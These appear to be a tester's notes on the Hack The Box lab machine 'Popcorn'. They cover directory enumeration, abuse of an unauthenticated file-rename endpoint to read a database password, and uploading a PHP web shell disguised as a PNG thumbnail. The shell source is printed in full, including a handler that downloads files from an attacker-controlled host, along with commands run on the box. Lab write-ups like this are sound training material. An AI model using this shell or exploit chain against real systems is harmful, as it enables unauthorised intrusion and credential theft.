2: port 80 (HTTP)

http://10.10.10.6/
Default Apache "It works!" placeholder page

$ gobuster dir -u http://10.10.10.6 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
/index.html           (Status: 200) [Size: 177]
/index                (Status: 200) [Size: 177]
/test.php             (Status: 200) [Size: 47044]
/test                 (Status: 200) [Size: 47032]
/torrent              (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]
/rename               (Status: 301) [Size: 309] [--> http://10.10.10.6/rename/]

http://10.10.10.6/test | http://10.10.10.6/test.php  (exposed phpinfo page: leaks PHP version, config path and document root, values below)
PHP Version 5.2.10-2ubuntu6.10
System 	Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 
Configuration File Path 	/etc/php5/apache2 
Hostname:Port 	popcorn.hackthebox.gr:80 
DOCUMENT_ROOT	/var/www
SCRIPT_FILENAME 	/var/www/test.php 

http://10.10.10.6/rename/ | http://10.10.10.6/rename/index.php
Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name
# works: unauthenticated arbitrary file rename. Both parameters take absolute paths and the endpoint
# apparently applies no restriction, so any file www-data can write can be moved or renamed
# tested using > (this moves test.php away; rename it back afterwards so nothing stays broken)
GET /rename/index.php?filename=/var/www/test.php&newfilename=/var/www/kashz.php HTTP/1.1

http://10.10.10.6/kashz.php
# shows phpinfo: confirms the rename took effect and that the moved file still executes as PHP

http://10.10.10.6/torrent/
Torrent Hoster

$ gobuster dir -u http://10.10.10.6/torrent/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
/index.php            (Status: 200) [Size: 11356]
/images               (Status: 301) [Size: 317] [--> http://10.10.10.6/torrent/images/]
/upload               (Status: 301) [Size: 317] [--> http://10.10.10.6/torrent/upload/]
/download             (Status: 200) [Size: 0]
/rss                  (Status: 200) [Size: 964]
/login.php            (Status: 200) [Size: 8371]
/templates            (Status: 301) [Size: 320] [--> http://10.10.10.6/torrent/templates/]
/users                (Status: 301) [Size: 316] [--> http://10.10.10.6/torrent/users/]
/admin                (Status: 301) [Size: 316] [--> http://10.10.10.6/torrent/admin/]
/health               (Status: 301) [Size: 317] [--> http://10.10.10.6/torrent/health/]
/browse.php           (Status: 200) [Size: 9278]
/comment.php          (Status: 200) [Size: 936]
/css                  (Status: 301) [Size: 314] [--> http://10.10.10.6/torrent/css/]
/edit.php             (Status: 200) [Size: 0]
/lib                  (Status: 301) [Size: 314] [--> http://10.10.10.6/torrent/lib/]
/database             (Status: 301) [Size: 319] [--> http://10.10.10.6/torrent/database/]
/secure.php           (Status: 200) [Size: 4]
/js                   (Status: 301) [Size: 313] [--> http://10.10.10.6/torrent/js/]
/logout               (Status: 200) [Size: 182]
/logout.php           (Status: 200) [Size: 182]
/preview              (Status: 200) [Size: 28104]
/config.php           (Status: 200) [Size: 0]
/readme               (Status: 301) [Size: 317] [--> http://10.10.10.6/torrent/readme/]
/thumbnail.php        (Status: 200) [Size: 1789]
/torrents.php         (Status: 200) [Size: 6477]
/torrents             (Status: 301) [Size: 319] [--> http://10.10.10.6/torrent/torrents/]
/validator.php        (Status: 200) [Size: 0]
/hide                 (Status: 200) [Size: 3765]
/PNG                  (Status: 301) [Size: 314] [--> http://10.10.10.6/torrent/PNG/]

http://popcorn.htb/torrent/readme/readme.html
Torrent Hoster 2.0
- /database/th_database.sql
- config.php
- go to the url where you uploaded the script and you are good to go. Admin username: admin; password : admin12
# the readme credentials (admin / admin12) do not work on the login page

http://10.10.10.6/torrent/database/th_database.sql
[truncated]
-- 
-- Table structure for table `users`
-- 

CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL auto_increment,
  `userName` varchar(40) NOT NULL default '',
  `password` varchar(40) NOT NULL default '',
  `privilege` varchar(10) NOT NULL default '',
  `email` varchar(30) NOT NULL default '',
  `joined` datetime NOT NULL default '0000-00-00 00:00:00',
  `lastconnect` datetime NOT NULL default '0000-00-00 00:00:00',
  PRIMARY KEY  (`id`),
  UNIQUE KEY `userName` (`userName`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=4 ;

-- 
-- Dumping data for table `users`
-- 
INSERT INTO `users` VALUES (3, 'Admin', '1844156d4166d94387f1a4ad031ca5fa', 'admin', 'admin@yourdomain.com', '2007-01-06 21:12:46', '2007-01-06 21:12:46');
# 32 hex chars, i.e. MD5-length and presumably unsalted; this is the 2007 install dump, so the live DB may hold a different hash

http://10.10.10.6/torrent/config.php
# returns an empty body (gobuster Size: 0): the PHP is executed server-side, so the source is never sent
# rename it to config.txt via /rename/ so Apache serves it as plain text instead of executing it
GET /rename/index.php?filename=/var/www/torrent/config.php&newfilename=/var/www/torrent/config.txt HTTP/1.1
# works
HTTP/1.1 200 OK
OK!

http://10.10.10.6/torrent/config.txt
$CFG->host = "localhost";
$CFG->dbName = "torrenthoster";	//db name
$CFG->dbUserName = "torrent";    //db username
$CFG->dbPassword = "SuperSecret!!";	//db password
# rename it straight back to config.php: while it is config.txt every script that include()s it is broken (login.php does, see below)

# doing the same with /torrent/login.php to confirm whether it uses config.php or hard-coded DB values
GET /rename/index.php?filename=/var/www/torrent/login.php&newfilename=/var/www/torrent/login.txt HTTP/1.1

HTTP/1.1 200 OK
OK!

http://10.10.10.6/torrent/login.txt
include("config.php");

# still cannot log in with the readme / dump credentials: login.php reads the DB through config.php, so the admin password in the live DB presumably differs from the 2007 dump

http://10.10.10.6/torrent/users/index.php?mode=register
# registering a new user kashz:kashz
logging in with the new account at > http://10.10.10.6/torrent/index.php

# authenticated users get an upload section for .torrent files

Using http://sample-file.bazadanni.com/2012/01/torrent.html
# got a sample torrent and uploaded.
# after uploading, the torrent's thumbnail can be edited (image upload)
# the image is stored web-accessible at http://10.10.10.6/torrent/upload/d0d14c926e6e99761a2fdcff27b403d96376eff6.png (40-hex name, original extension kept)

# time to modify the thumbnail: upload a PHP payload under a .png name
$ cat kashz.png
<?php
// Minimal web shell, uploaded as a "thumbnail" (kashz.png) and later given a .php name via /rename/.
// Both handlers are unauthenticated: anyone who can reach the renamed file gets the same access,
// so remove it once the engagement is done.
// $_REQUEST merges GET, POST and COOKIE by default, so either parameter can arrive in any of them.
    if (isset($_REQUEST['cmd'])) {
        // Runs the raw value as a shell command under the web server account (www-data on this box)
        // and echoes the output wrapped in <pre>; nothing is validated or escaped.
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
    }
    if (isset($_REQUEST['fupload'])) {
        // Fetches http://10.10.16.5/<fupload> (the attacker host) and writes it to a local path
        // taken from the same parameter, presumably relative to the script's working directory.
        // Needs allow_url_fopen on the target for the http:// wrapper to work.
        file_put_contents($_REQUEST['fupload'], file_get_contents('http://10.10.16.5/' . $_REQUEST['fupload']));
    };
?>
# upload accepted: the thumbnail check evidently does not inspect file content (the "PNG" is plain PHP text)
# the file still has a .png extension, so Apache will not execute it; use /rename/ to give it a .php name

# moving the uploaded file to /var/www/torrent/kashz.php (web root of the torrent app)
GET /rename/index.php?filename=/var/www/torrent/upload/d0d14c926e6e99761a2fdcff27b403d96376eff6.png&newfilename=/var/www/torrent/kashz.php HTTP/1.1

HTTP/1.1 200 OK
OK!

http://10.10.10.6/torrent/kashz.php?cmd=whoami;id;hostname;uname%20-a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
popcorn
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux

# a fuller web shell can be pulled in through the fupload handler, e.g.
http://10.10.10.6/torrent/kashz.php?fupload=web.php
# (requires an HTTP server on 10.10.16.5 serving web.php; the file is written relative to the script's working directory)
